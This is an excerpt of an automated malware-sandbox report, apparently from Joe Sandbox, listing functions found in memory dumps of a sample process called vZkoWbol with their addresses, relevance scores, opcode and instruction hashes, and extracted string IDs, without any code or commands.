                                                                    • Source File: 0000000C.00000002.4524608361.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_134d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction ID: 358b8133892900146211b70f372dbe00c0e259a56738d1bf20249dfc3ce7081c
                                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction Fuzzy Hash: 7A11DD75504280CFDB02CF64D5C4B15BFA2FB84318F24C6AAD9494B396C33AE40ACFA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0134D03F Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4524608361.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_134d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction ID: f3572f0e8a4ab1521e83cf889116cfa8940cd8e6252aa4944c6ef7a261895cdf
                                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction Fuzzy Hash: B811DD75504284CFDB12CF54C9C4B15BFA2FB88318F24C6ADD8494B252C33AE44ACF62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0134D207 Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4524608361.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_134d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                                                    • Instruction ID: 26819a50f525d5ed1305b73ba6f34d275c3fd0000d4c5592e913b42e59c34953
                                                                    • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                                                    • Instruction Fuzzy Hash: 5311BF76504284CFDB12CF54D5C4B16FFA1FB84328F24C6AAD8494B656C33AE40ACBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D53BBF Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 57a18e7d0ac7b386801ef0b995d5f95fe47abd4166c1c0da2e5f466dff7d1e09
                                                                    • Instruction ID: 11a14afb8c1d810bcc51031c4bc4e8d449f657c1d7f57de7cd002b68a26e1e81
                                                                    • Opcode Fuzzy Hash: 57a18e7d0ac7b386801ef0b995d5f95fe47abd4166c1c0da2e5f466dff7d1e09
                                                                    • Instruction Fuzzy Hash: EF01F232B140291BDF489AA9DC106BFB7ABDBC8654F16403AC80AE7284EE65CC0247D2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D53890 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ecc5c0f01fc39ad4c20f81c48eebdec720119a4fc3918e7857cb7177b2e5fda3
                                                                    • Instruction ID: 2757e133c35f4241ca289985643b43bea1b93cab91566fffaeececfd719f02d2
                                                                    • Opcode Fuzzy Hash: ecc5c0f01fc39ad4c20f81c48eebdec720119a4fc3918e7857cb7177b2e5fda3
                                                                    • Instruction Fuzzy Hash: 1111A2B5D01259AFCB00DF9AD884ADEFFB4FB49310F50812AE918B7640D374A554CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D54220 Relevance: .1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a689621d020825315e70d20681a03248f0117331b17a6106e9df4d3696053fe5
                                                                    • Instruction ID: bf793e155de5cd4b32f7dc2717269a9239bce5f6a0a092a97366772176a16439
                                                                    • Opcode Fuzzy Hash: a689621d020825315e70d20681a03248f0117331b17a6106e9df4d3696053fe5
                                                                    • Instruction Fuzzy Hash: 1801D131B101214BDF659ABED444B2BB3DBDBC9725F118839E90ECB750EE65DC824382
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5ED78 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d063ad9fcd3912b4bb7fd09853ae38e915f68b2f3ef1881fc1b7598998796318
                                                                    • Instruction ID: 09fcc79ee55c04484c6a9d53a35cd6c709525435b484e5000d60cb4ead8d8c65
                                                                    • Opcode Fuzzy Hash: d063ad9fcd3912b4bb7fd09853ae38e915f68b2f3ef1881fc1b7598998796318
                                                                    • Instruction Fuzzy Hash: 8301F431B000110BDF65E67ED454B2EA3DBDBCA625F11883AE90EC7740DE19DD024381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5AF02 Relevance: .0, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a8bdf75aa3d73da6fb1a8dd0ddbca832ef5579bae2fee7b926d51a21d8a0e94e
                                                                    • Instruction ID: bc7ca50123fb4c9d187a76606cc931e4254c1bbcdc481e8e7907f81fbec6ed08
                                                                    • Opcode Fuzzy Hash: a8bdf75aa3d73da6fb1a8dd0ddbca832ef5579bae2fee7b926d51a21d8a0e94e
                                                                    • Instruction Fuzzy Hash: 4B014471E102298BDF20DB68E44079EBBA9EB46324F004A3AF80AEF340D631DC45C781
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5A2F8 Relevance: .0, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 35d161e2a6a2dba059c03cfc86dacedb471d64e9502e9f52c526dbf9de2b9594
                                                                    • Instruction ID: 1bd05e73ec48a198c1d4c6577c11bd45c312cbb27be8d402eeebd9f7ba12e555
                                                                    • Opcode Fuzzy Hash: 35d161e2a6a2dba059c03cfc86dacedb471d64e9502e9f52c526dbf9de2b9594
                                                                    • Instruction Fuzzy Hash: F201F430B100210BEF50EBBDE850B1E73D6EBCA759F118938E50AC7394EE29EC424381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D56448 Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1b724922d2f90a5890d43845aaa3076546460a6ce10af9de112dfd904e539d4
                                                                    • Instruction ID: ad9016a80e0a63c337b300aa6f56d18d61aa5497f7d1021545ed3d06d74c0f90
                                                                    • Opcode Fuzzy Hash: e1b724922d2f90a5890d43845aaa3076546460a6ce10af9de112dfd904e539d4
                                                                    • Instruction Fuzzy Hash: F6E068B0E0D2C86BDF51CB709C5435A7BBCDB06200F3285E6D808CB552E535CE028362
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 06D57680 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2843079600
                                                                    • Opcode ID: 092c63ddc1fea8cc520e57cc7b8a4563e11f94bc87b42604c901a08089c2fe1b
                                                                    • Instruction ID: 9fd7fa108b6883409d645f7e74aa3f95160bdedda2bdb049a24d5e8581f9cbbf
                                                                    • Opcode Fuzzy Hash: 092c63ddc1fea8cc520e57cc7b8a4563e11f94bc87b42604c901a08089c2fe1b
                                                                    • Instruction Fuzzy Hash: 02122B30E00219CFDF68DF69D894AADB7B2FF88704F218569D809AB654DB349D85CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5A920 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-1273862796
                                                                    • Opcode ID: 977454d4d59a18e3d7d4026850f5c9014de1b90825e341ce3a1b9bb35aced33b
                                                                    • Instruction ID: 644c812b93b7a89ea56adf899bea6731cce8798c6062ed3c2437c5c6084756c3
                                                                    • Opcode Fuzzy Hash: 977454d4d59a18e3d7d4026850f5c9014de1b90825e341ce3a1b9bb35aced33b
                                                                    • Instruction Fuzzy Hash: 6991A030A00219DFEF68DF69D680B6E77F6FF84704F198629E841AB650DB789C45CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D57080 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-981061697
                                                                    • Opcode ID: 24be183d9d67952eb21e6d412e09c6125f8e269b03ad7323720278d8fb6a06fe
                                                                    • Instruction ID: e36741318806fd5e22feab6b2ed5554139f62e35030d3fc9fa1571098320d335
                                                                    • Opcode Fuzzy Hash: 24be183d9d67952eb21e6d412e09c6125f8e269b03ad7323720278d8fb6a06fe
                                                                    • Instruction Fuzzy Hash: 8CF15C34A00209CFDB58DFA9D590A6EB7B7FF84344F258469D8159B7A4CB39DC82CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5B9E8 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-3723351465
                                                                    • Opcode ID: e6804053e0f5ba99719fef7de68ef0a3438840c4de690dfa01c71153bc5b81f9
                                                                    • Instruction ID: 0acbe2122c5340af315eb7e504a92a19c132f423d73f2f6ee599dd48b6d62e96
                                                                    • Opcode Fuzzy Hash: e6804053e0f5ba99719fef7de68ef0a3438840c4de690dfa01c71153bc5b81f9
                                                                    • Instruction Fuzzy Hash: 87719E30E002098FDF68DFA9D5A0A6DB7F6FF84314F11852AD806EB654DBB4E945CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D583B8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                    • API String ID: 0-858218434
                                                                    • Opcode ID: 0ab276de552ad736fecf49127e112901c926622f8d66039d19a0d91bfdd55c65
                                                                    • Instruction ID: 2aab17cb79b29d72e265d21c5c30e3c38bdad6a5544ed7b471d87e3bb9ada046
                                                                    • Opcode Fuzzy Hash: 0ab276de552ad736fecf49127e112901c926622f8d66039d19a0d91bfdd55c65
                                                                    • Instruction Fuzzy Hash: 63B14830E002198FDB58DFA9D5906AEB7B6FF84304F258829D806DB754DB39DC86CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D587D0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LR]q$LR]q$$]q$$]q
                                                                    • API String ID: 0-3527005858
                                                                    • Opcode ID: bdbb5b8ad7b71a2dda33c9d1b36add8574e628f33794d1020b4807e1817a5c7c
                                                                    • Instruction ID: 61674e74fe7243dcd7186255db4cd2d90b554c95c101e6f8c5030572b981d3f9
                                                                    • Opcode Fuzzy Hash: bdbb5b8ad7b71a2dda33c9d1b36add8574e628f33794d1020b4807e1817a5c7c
                                                                    • Instruction Fuzzy Hash: 6451D130B002159FDB58DF39D980A6ABBF6FF88704F118568E8169B764DB34EC45CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%